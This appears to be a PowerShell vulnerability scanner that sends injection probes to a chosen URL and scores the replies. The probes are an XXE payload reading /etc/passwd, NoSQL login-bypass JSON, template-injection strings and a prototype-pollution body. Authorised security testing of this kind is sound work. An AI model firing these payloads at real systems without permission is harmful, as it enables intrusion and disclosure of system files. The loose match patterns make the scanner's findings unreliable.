﻿# Advanced Injection Testing Script (PowerShell) - CWE-611, CWE-943, CWE-94, CWE-90, CWE-1321
param([string]$TargetUrl, [ValidateSet("quick","full")][string]$Mode="full", [switch]$Help)

if ($Help) { Write-Host "[*] Advanced Injection Scanner"; exit 0 }
if ([string]::IsNullOrEmpty($TargetUrl)) { Write-Host "Error: TargetUrl required" -ForegroundColor Red; exit 1 }
if ($TargetUrl -notmatch "^https?://") { $TargetUrl = "https://$TargetUrl" }
$TargetUrl = $TargetUrl.TrimEnd('/')

# Authentication support (Cookie or Bearer token)
$AuthCookie = $env:AUTH_COOKIE
$AuthToken = $env:AUTH_TOKEN

# Helper function for authenticated web requests
function Invoke-AuthWebRequest {
    param([string]$Uri, [string]$Method = "GET", [object]$Body, [string]$ContentType, [int]$TimeoutSec = 10)
    $params = @{ Uri = $Uri; Method = $Method; TimeoutSec = $TimeoutSec; UseBasicParsing = $true; ErrorAction = "SilentlyContinue" }
    if ($Body) { $params.Body = $Body }
    if ($ContentType) { $params.ContentType = $ContentType }
    $headers = @{}
    if ($AuthToken) { $headers["Authorization"] = "Bearer $AuthToken" }
    if ($headers.Count -gt 0) { $params.Headers = $headers }
    if ($AuthCookie -and -not $AuthToken) {
        $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
        $AuthCookie -split ';' | ForEach-Object {
            $parts = $_.Trim() -split '=', 2
            if ($parts.Count -eq 2) {
                try { $session.Cookies.Add((New-Object System.Net.Cookie($parts[0], $parts[1], "/", ([Uri]$Uri).Host))) } catch {}
            }
        }
        $params.WebSession = $session
    }
    Invoke-WebRequest @params
}

$script:TestsPassed=0; $script:TestsFailed=0; $script:TestsTotal=0; $script:HighRiskFindings=0; $script:HighRiskList=@()
$script:AuthErrors=0  # Track 401/403 responses

Write-Host "`n[*] ADVANCED INJECTION SCANNER" -ForegroundColor Magenta
Write-Host "Target: $TargetUrl | Mode: $Mode" -ForegroundColor Blue
if ($AuthToken) { Write-Host "[*] Bearer token authentication enabled" -ForegroundColor Green }
if ($AuthCookie -and -not $AuthToken) { Write-Host "[*] Cookie authentication enabled" -ForegroundColor Green }
if (-not $AuthToken -and -not $AuthCookie) { Write-Host "[i] Running without authentication (unauthenticated scan)" -ForegroundColor Yellow }

Write-Host ""

function Test-XXE {
    Write-Host "`n[*] PHASE 1: XXE INJECTION" -ForegroundColor Yellow
    $script:TestsTotal++; $vuln = $false
    $payload = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    try {
        $r = Invoke-AuthWebRequest -Uri $TargetUrl -Method Post -Body $payload -ContentType "application/xml" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
        if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++ }
        elseif ($r.Content -match "root:|ami-id") { $vuln = $true; Write-Host "  [!] XXE detected" -ForegroundColor Red }
    } catch {
        if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
    }
    if ($vuln) { Write-Host "[-] FAIL: XXE" -ForegroundColor Red; $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "XXE (CWE-611)" }
    else { Write-Host "[+] PASS: XXE blocked" -ForegroundColor Green; $script:TestsPassed++ }
}

function Test-NoSQLInjection {
    Write-Host "`n[*] PHASE 2: NOSQL INJECTION" -ForegroundColor Yellow
    $script:TestsTotal++; $vuln = $false
    $payloads = @('{"username":{"$ne":""},"password":{"$ne":""}}', '{"$where":"1==1"}')
    foreach ($payload in $payloads) {
        try {
            $r = Invoke-AuthWebRequest -Uri "$TargetUrl" -Method Post -Body $payload -ContentType "application/json" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
            if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
            if ($r.Content -match "success|token|welcome") { $vuln = $true; Write-Host "  [!] NoSQL bypass" -ForegroundColor Red; break }
        } catch {
            if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
        }
    }
    if ($vuln) { Write-Host "[-] FAIL: NoSQL Injection" -ForegroundColor Red; $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "NoSQL (CWE-943)" }
    else { Write-Host "[+] PASS: NoSQL blocked" -ForegroundColor Green; $script:TestsPassed++ }
}

function Test-SSTI {
    Write-Host "`n[*] PHASE 3: SSTI" -ForegroundColor Yellow
    $script:TestsTotal++; $vuln = $false
    $payloads = @("{{7*7}}", '${7*7}', "{{config}}")
    foreach ($payload in $payloads) {
        try {
            $encoded = [System.Web.HttpUtility]::UrlEncode($payload)
            $r = Invoke-AuthWebRequest -Uri "$TargetUrl/?name=$encoded" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
            if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
            if ($r.Content -match "49|config|class") { $vuln = $true; Write-Host "  [!] SSTI: $payload" -ForegroundColor Red; break }
        } catch {
            if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
        }
    }
    if ($vuln) { Write-Host "[-] FAIL: SSTI" -ForegroundColor Red; $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "SSTI (CWE-94)" }
    else { Write-Host "[+] PASS: SSTI blocked" -ForegroundColor Green; $script:TestsPassed++ }
}

function Test-PrototypePollution {
    Write-Host "`n[*] PHASE 4: PROTOTYPE POLLUTION" -ForegroundColor Yellow
    $script:TestsTotal++; $vuln = $false
    $payload = '{"__proto__":{"admin":true}}'
    try {
        $r = Invoke-AuthWebRequest -Uri "$TargetUrl" -Method Post -Body $payload -ContentType "application/json" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
        if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++ }
        elseif ($r.Content -match "admin.*true") { $vuln = $true; Write-Host "  [!] Prototype pollution" -ForegroundColor Red }
    } catch {
        if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
    }
    if ($vuln) { Write-Host "[-] FAIL: Prototype Pollution" -ForegroundColor Red; $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "Prototype Pollution" }
    else { Write-Host "[+] PASS: Blocked" -ForegroundColor Green; $script:TestsPassed++ }
}

function Show-Summary {
    Write-Host "`n======================================================" -ForegroundColor Magenta
    Write-Host " ADVANCED INJECTION SUMMARY" -ForegroundColor Magenta
    $rate = if($script:TestsTotal -gt 0){[Math]::Round(($script:TestsPassed/$script:TestsTotal)*100)}else{0}
    Write-Host "Tests: $($script:TestsTotal) | Passed: $($script:TestsPassed) | Failed: $($script:TestsFailed) | Rate: $rate%"
    if ($script:HighRiskList.Count -gt 0) { $script:HighRiskList | ForEach-Object { Write-Host "  [!] $_" -ForegroundColor Red } }

    # Warn about authentication errors
    if ($script:AuthErrors -gt 0) {
        Write-Host ""
        Write-Host "[!]  WARNING: $($script:AuthErrors) requests returned 401/403 Unauthorized" -ForegroundColor Yellow
        if (-not $AuthToken -and -not $AuthCookie) {
            Write-Host "   Results may have FALSE NEGATIVES. Provide credentials to test protected endpoints." -ForegroundColor Yellow
        } else {
            Write-Host "   Provided credentials may be invalid or expired." -ForegroundColor Yellow
        }
    }

    $score = 100 - ($script:HighRiskFindings * 20); if($score -lt 0){$score=0}
    Write-Host "Score: $score/100" -ForegroundColor $(if($score -ge 80){"Green"}else{"Red"})
}

Test-XXE; Test-NoSQLInjection; Test-SSTI
if ($Mode -eq "full") { Test-PrototypePollution }
Show-Summary
